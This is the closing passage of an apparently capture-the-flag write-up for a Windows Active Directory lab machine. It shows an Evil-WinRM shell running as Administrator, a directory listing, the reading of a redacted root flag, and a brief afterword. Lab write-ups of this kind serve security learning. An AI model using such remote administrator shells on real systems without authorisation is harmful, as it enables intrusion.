d-r--- 9/20/2019 4:04 PM Favorites
d-r--- 9/20/2019 4:04 PM Links
d-r--- 9/20/2019 4:04 PM Music
d-r--- 9/20/2019 4:04 PM Pictures
d-r--- 9/20/2019 4:04 PM Saved Games
d-r--- 9/20/2019 4:04 PM Searches
d-r--- 9/20/2019 4:04 PM Videos
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/6/2024 11:34 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX // 32-character root flag
Yes!
Afterword
This was probably a difficult box for anyone without a solid understanding of Active Directory.
A good learning experience. 🍃